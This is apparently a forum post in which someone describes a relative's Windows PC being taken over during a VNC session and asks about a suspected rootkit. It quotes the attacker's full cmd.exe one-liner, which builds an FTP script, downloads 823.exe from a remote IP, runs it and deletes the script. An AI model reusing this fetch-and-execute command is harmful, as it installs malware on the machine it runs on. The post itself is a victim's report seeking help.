My brother-in-law just called me frantically saying his computer had been hacked. He was in a remote session to his computer from work using VNC when he suddenly lost, and could not regain, the connection.
When he got home, he noticed that when he clicked start > run, the last command was:
cmd.exe /c del i&echo open 18.104.22.168 27206 > i&echo user 1 1 >> i &echo get 823.exe >> i &echo quit >> i &ftp -n -s:i &823.exe&del i&exit
Now, if you connect to that IP on that port, you'll be greated with "220 Reptile welcomes you.." which looks like a standard FTP greeting, but accepts no commands. Everything I enter I receive a 503 command unknown. Also, none of his system commands are working (ie. cd, netstat, ipconfig, etc.). Sounds sorta like a rootkit.